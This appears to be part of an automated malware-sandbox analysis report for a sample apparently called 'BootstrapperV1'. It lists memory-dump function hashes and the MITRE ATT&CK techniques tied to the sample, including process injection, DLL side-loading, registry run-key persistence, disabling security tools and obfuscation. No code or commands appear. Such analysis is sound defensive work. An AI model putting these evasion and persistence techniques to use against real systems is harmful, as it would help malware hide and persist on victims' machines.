Instruction ID: 2f658d55c711629889e30577a80977d99c95e6be29e970c35e92978ad3fef8d9
Opcode Fuzzy Hash: 764e3fd05a7be05a68b09ce6df1cdf30d4373c12c0afdf43b6369d337eeb4403
Instruction Fuzzy Hash: 3211B221A0EBCA0FE757872888754A47FB1EF5620075A40EBD094CF1F3EA19AD4AC342

Function 00007FFD9B626BFD Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc2619fa049f8fb5dd5869c184ffecb9fd35cef44634023c33c6fc8ca72fce10
Instruction ID: 3faa6a49a512af6d37d51e2dccf36d7f4326d09b4931051735be36e6086d4972
Opcode Fuzzy Hash: cc2619fa049f8fb5dd5869c184ffecb9fd35cef44634023c33c6fc8ca72fce10
Instruction Fuzzy Hash: DF118125F15A5D8BEB54EBD8C891AEDB7A2FF99300F500175D01DE7296DD187C01C711

Function 00007FFD9B6258A8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 002cca0b1226258fe68713a7256079da53e55511d62181c5892394258e1524c7
Instruction ID: 74de34adf7f1bb90f92f3eec9045c695729f8c0d985f33a068c1d1572c9841b4
Opcode Fuzzy Hash: 002cca0b1226258fe68713a7256079da53e55511d62181c5892394258e1524c7
Instruction Fuzzy Hash: 4811E732F1A95A4FE6A8EB6890715F533D0EF443207498476D16ECB1D6ED18F5414740

Function 00007FFD9B626378 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8296243e218a2227683fe483079649d866738f2ed4cd6eff8f27cb9fb97b47
Instruction ID: b919e345cc39c338bdbf482cdafc6cc64ed0ea76c4f2355be977a6c9fe693795
Opcode Fuzzy Hash: 8f8296243e218a2227683fe483079649d866738f2ed4cd6eff8f27cb9fb97b47
Instruction Fuzzy Hash: CD012653F4F99E1FF634526828544741681CB452B0B5906FAD8DDCB1E6EC0C3D830390

Function 00007FFD9B629238 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61d4e4400749041bc6f986c33c17cec733cc91d250558f0e38afdbfd440737b
Instruction ID: 6d3d184ffba239d1246ade01c8699b6950a1559b91fd8a856d8115a6db2a2792
Opcode Fuzzy Hash: d61d4e4400749041bc6f986c33c17cec733cc91d250558f0e38afdbfd440737b
Instruction Fuzzy Hash: AA01D22161BA590FFBB0DB6D84697A43BD0FF9A300F0501FAD09CCB2A2D918A940C381

Function 00007FFD9B62C358 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c903d0889f888ad05df974eea3a67c8dca103f10c5d4b0b3f09ba3731e630c28
Instruction ID: 97505600d0f7a03f32de47000218ffb3b3cd469d3d155040f8182b44c77ceb76
Opcode Fuzzy Hash: c903d0889f888ad05df974eea3a67c8dca103f10c5d4b0b3f09ba3731e630c28
Instruction Fuzzy Hash: 56F0F622B1EE4E0FFBA8D66C606417563E1EBD8265715057BD46DC72A5EC14FD424340

Function 00007FFD9B626C3C Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54763d87ddd83c624d8a3c121af6dfe7cbaa7e5da30727cd3732df253d97fe00
Instruction ID: 34261ab956bfbb1ee1873f0a20d0316a264f7f0426ab3a5206f69b9c5e295e61
Opcode Fuzzy Hash: 54763d87ddd83c624d8a3c121af6dfe7cbaa7e5da30727cd3732df253d97fe00
Instruction Fuzzy Hash: 8501F530B0664D8FEB55EBA8D8916EC7BE1FF99340F1001B6D018DB2A2DD283802C710

Function 00007FFD9B62D35D Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1788b131d607005432e81726b5f808d53e5dd60d507938cdfd6134d16ed93d2a
Instruction ID: 4ff18e02936da80833ba845507e82374497906e85af7067e87cee83b4cf0751e
Opcode Fuzzy Hash: 1788b131d607005432e81726b5f808d53e5dd60d507938cdfd6134d16ed93d2a
Instruction Fuzzy Hash: 5401FC11B0DEC90FF766A73854241646BD0EF96220B4901FBC0D9CA1D7DD1435028381

Function 00007FFD9B620BA3 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de48974c13b40c2ea8f4b3f2fa1733ed001bca50d097c79049f76495ba6eb3a
Instruction ID: 20fc34a857cce1d4a813b788140c2bfbc3ac84e0195ad550c1a3cc8e91715da9
Opcode Fuzzy Hash: 0de48974c13b40c2ea8f4b3f2fa1733ed001bca50d097c79049f76495ba6eb3a
Instruction Fuzzy Hash: 7301DF24B0B24E0FF77A8BA884693BCB6D1EF41315F15407EC009CB6E1CA6D6C86C700

Function 00007FFD9B62E871 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9276c0833218b15d4b19c63feec1cd23d6fb9838bac5f770ef0587867cc0cd1c
Instruction ID: 753f29537deedd24528b73eae3375cc4371ecbae8f1009deaf7fba67981f51b1
Opcode Fuzzy Hash: 9276c0833218b15d4b19c63feec1cd23d6fb9838bac5f770ef0587867cc0cd1c
Instruction Fuzzy Hash: E2F0B456E4FACE1FF365826C18A41641B91DB9526071D02FBC4D8CA1E7DC1D3D474391

Function 00007FFD9B625A0C Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94a23ab8e43bf53f44a95c6eb871323a1e2a6a32445c37f840db764fd08b962
Instruction ID: c57431a1b5be13684b0bd3892abfdf425e48b48bbe251266ee26b56879c6a149
Opcode Fuzzy Hash: b94a23ab8e43bf53f44a95c6eb871323a1e2a6a32445c37f840db764fd08b962
Instruction Fuzzy Hash: 82F0B471A0DA8D4FE7E0DB6D88A6A1137D0FF6520070501ABE458C7262DA54FC018791

Function 00007FFD9B625AC9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3997260a49f476e40755cf9fda837c3e7a3f6433e9dee3d76868474f1aab04
Instruction ID: 368050bfa6757272c23a030ad5132a5f2e9e7b3919d1609d2f7c8e9a6b473a58
Opcode Fuzzy Hash: 7b3997260a49f476e40755cf9fda837c3e7a3f6433e9dee3d76868474f1aab04
Instruction Fuzzy Hash: 1801D13091EBCD4FEB56EF2888640A97FB0FF55200B4504EBD468C71A3DA7459148341

Function 00007FFD9B632288 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1983e027e667d50e1bc23a6f795d45d45bd34efb92270d36bfd2fedc3bcc7186
Instruction ID: 354fe5cb3d5d30e0d65309bc14d59bd32b06442a3296291dfa2a332e9253b993
Opcode Fuzzy Hash: 1983e027e667d50e1bc23a6f795d45d45bd34efb92270d36bfd2fedc3bcc7186
Instruction Fuzzy Hash: 48F0E512F0ED8E0AEAA491FC2CAA1B427D1EF952A171D02B7C868CF1E5DD197D834381

Function 00007FFD9B62B8D2 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40b509118e68281069e0d7169ad024ca0f4f30f4dbdbf11103660c793a3155c
Instruction ID: 9dfe115433265faf9fc0c847b6ef766a90fb2337ab12557aafd16defb2e8bd46
Opcode Fuzzy Hash: a40b509118e68281069e0d7169ad024ca0f4f30f4dbdbf11103660c793a3155c
Instruction Fuzzy Hash: 2CF0C82190EADA0FF326977895655A07BE0EF86310B0E01F7D49CCF2A3D91CBA85C351

Function 00007FFD9B636443 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aebd201cc30411bc9225d09b732a5df8c74b7ba6ef9dd1f14139ec804faa1971
Instruction ID: 9687698d21bda2e0c3863c5ce24bd193203e1a57dc72abda5f48718256082721
Opcode Fuzzy Hash: aebd201cc30411bc9225d09b732a5df8c74b7ba6ef9dd1f14139ec804faa1971
Instruction Fuzzy Hash: D0F0FE72A2CB088B9F18AE4CBC434AD77D0FB89B60F10116FF95943211D621B9928AC7

Function 00007FFD9B6262FB Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1965829cf61d4a2476de59377ac8da09adbdc44f43f9d9feb4c3496ce9ffff6
Instruction ID: 0899ab93f580d140291c932626b9f1210a444bfe442703b3d2bd91b5c9968741
Opcode Fuzzy Hash: e1965829cf61d4a2476de59377ac8da09adbdc44f43f9d9feb4c3496ce9ffff6
Instruction Fuzzy Hash: 59F02713B0A81E05D6B461AC28A52F913C1DFC92B275902B6D868CA1A6DD057D424280

Function 00007FFD9B620875 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75c25f1b18c7e6df040c594da3fb44f4c45181309e8140e9bace2651478abfa7
Instruction ID: 029a2332fd50c129eff9e938e00cbc9b39d9cdc876add1fdca8e3fc2426860e4
Opcode Fuzzy Hash: 75c25f1b18c7e6df040c594da3fb44f4c45181309e8140e9bace2651478abfa7
Instruction Fuzzy Hash: 34F0B461E0F68D5FF7519BB8402A1AD7BD1DF5565078681FFC04ACB272C91D1D024740

Function 00007FFD9B62087B Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d52a4d38340ce940e619a8fd3eaed35794e095aaa83642c7091d64e89d51417b
Instruction ID: 0e5c4e7c6b01a7bf3b8a7754efc7b3ec87d08fad7e3001d6c112377c96f88f46
Opcode Fuzzy Hash: d52a4d38340ce940e619a8fd3eaed35794e095aaa83642c7091d64e89d51417b
Instruction Fuzzy Hash: 01F06D2160EBCC5FEB669BB4882539A3FA0EB46300F0545EBD058CB2E7D92859088392

Function 00007FFD9B6208DD Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0e4b0baaf4b70ec7eeb9d60243aaf5ccb24b7bc226bd1f78a14c12425c3b5c
Instruction ID: 5927974c1884c3e666ef5b8f49600244a2420f529c77a25e43e269ee9edd73fa
Opcode Fuzzy Hash: 0f0e4b0baaf4b70ec7eeb9d60243aaf5ccb24b7bc226bd1f78a14c12425c3b5c
Instruction Fuzzy Hash: 4DF0BEA1E0FA8E5FF7919BB8002A1ADBBD0DF5565078682BEC00ACB262C91C29024740

Function 00007FFD9B6243A5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88a5e724ef98b1c1258011c573de44a34f75d9af9f5cc4fc979c9d06200f7033
Instruction ID: 8cdf90449bdcfdcba778fe3bac298a9a76a31f9d0c49bcffbcd4c7b560a35a92
Opcode Fuzzy Hash: 88a5e724ef98b1c1258011c573de44a34f75d9af9f5cc4fc979c9d06200f7033
Instruction Fuzzy Hash: D3F0E912A0D9298BF675E79960219F967D0AF04310B0A40FAD06CCB1E7DD45B9804385

Function 00007FFD9B6243F0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d615e98a71d531b2bd60f1c4707f043d95f54e73960c23a21bad22eb07667059
Instruction ID: caed18680acd0cb2b7b2ce50920992360146ef84f6a2cf867fc9d6bd63b22ca0
Opcode Fuzzy Hash: d615e98a71d531b2bd60f1c4707f043d95f54e73960c23a21bad22eb07667059
Instruction Fuzzy Hash: 41E04F6270E82D4FDAB8EA6C545466477D1EF4874071200EAD46DCF1E5D615AD048380

Function 00007FFD9B6240B0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2a1a401075dc92ccb22e0cde4212507af31ca28d6d8307d9375fcfecc910b10
Instruction ID: f660a9c7b419aac90adacc112d72acda83c5faea3a0b8416ad4c5ebc60c270ce
Opcode Fuzzy Hash: b2a1a401075dc92ccb22e0cde4212507af31ca28d6d8307d9375fcfecc910b10
Instruction Fuzzy Hash: 8AD05B13F1BC2E16F0B9736C342566D00C1DFC8620B87067AED1CD625DDC08BD8102C9

Function 00007FFD9B628120 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaced3cceceff35d1f8fe3ec9bb08492c00a4fbe4aa4e91d471ea881274501e2
Instruction ID: 485153b3085237add201f7bab081d05a28ba85c077f4558a3b381b0f9a2b693d
Opcode Fuzzy Hash: eaced3cceceff35d1f8fe3ec9bb08492c00a4fbe4aa4e91d471ea881274501e2
Instruction Fuzzy Hash: 22E0C225F0FD0A07FECCA5694CB605036C1EFE8208BE900A9C818CA2E1F81AE8828305

Function 00007FFD9B6263F8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fd3513acbb94f14bb395ae456e300db7c38f81f5a8ebc6029c21a9497038c47
Instruction ID: 0bd36bf9336b5301b58bb54cdb8a1378897efc58dd32dbf6e599cd608c3521f2
Opcode Fuzzy Hash: 9fd3513acbb94f14bb395ae456e300db7c38f81f5a8ebc6029c21a9497038c47
Instruction Fuzzy Hash: C9E0C220A2AA4A07F714AB724C5907B71D1FFC8201F854F36D88CC41A0FA3CE3C48242

Function 00007FFD9B626408 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4056ab64ad7aaf643877bd7c95dc83bab83a9ea4ac6a02b0be94804d0f7facf1
Instruction ID: 3b00265c625bc42c9f9ee60090f1b4f6ea8fef84c05f87bd21beeeceb994582f
Opcode Fuzzy Hash: 4056ab64ad7aaf643877bd7c95dc83bab83a9ea4ac6a02b0be94804d0f7facf1
Instruction Fuzzy Hash: F7D02E30A2AD1D16FBB0B3285018AFA6BD0CB44314F050A37EC1CEA2B1ED4CAA8142C1

Function 00007FFD9B625067 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3e3d3f20fe92cc52471f3fa943190179a9bb12de5b4cdfeca31f9624f4aa5c
Instruction ID: 5e2c7e163cb419a31971c4a672ab712a07cc3eedef21d26039ffd4aaefc2b215
Opcode Fuzzy Hash: 6b3e3d3f20fe92cc52471f3fa943190179a9bb12de5b4cdfeca31f9624f4aa5c
Instruction Fuzzy Hash: D3D02302709D0D0FA754B2DC70D49F963C1D7D8120351413BC52FC519ECC1C58C30340

Function 00007FFD9B62599D Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21a46042a644f4b1d82d984fb4cd7c0426bf9ee433c887fa04a3043ad13ce56a
Instruction ID: 1c56ab50c209dd975486a90456d6ed7db2f1c67420bb61784a0161c999e39e5f
Opcode Fuzzy Hash: 21a46042a644f4b1d82d984fb4cd7c0426bf9ee433c887fa04a3043ad13ce56a
Instruction Fuzzy Hash: 4ED0A711B29D0E0A9A5CB36C70659FC62C2EFC42207884576D41EC21DADC1C68820341

Function 00007FFD9B623983 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8595b174b444288bf1500fbc523e63f8e0d2f15a30c5e264e4366123edc4ad55
Instruction ID: 099b4602a646a15ec6ad0a12bc468678404c854f47df47a9615732fb90f56f41
Opcode Fuzzy Hash: 8595b174b444288bf1500fbc523e63f8e0d2f15a30c5e264e4366123edc4ad55
Instruction Fuzzy Hash: A1D05B31E0994D4FFF90DF5CC4515ADB7B1EB99310F400165D118D72A2D62068418740

Function 00007FFD9B6239A9 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
Instruction ID: 0a5599e8087a7d4d1fc14fda3415f78a1da155822f6609c1e2465ec34a551e28
Opcode Fuzzy Hash: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
Instruction Fuzzy Hash: D0C08C32F0080C8E9F80EBCCA0026ECB7F0EB8C231F041037D21CE3140DA2024504790

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
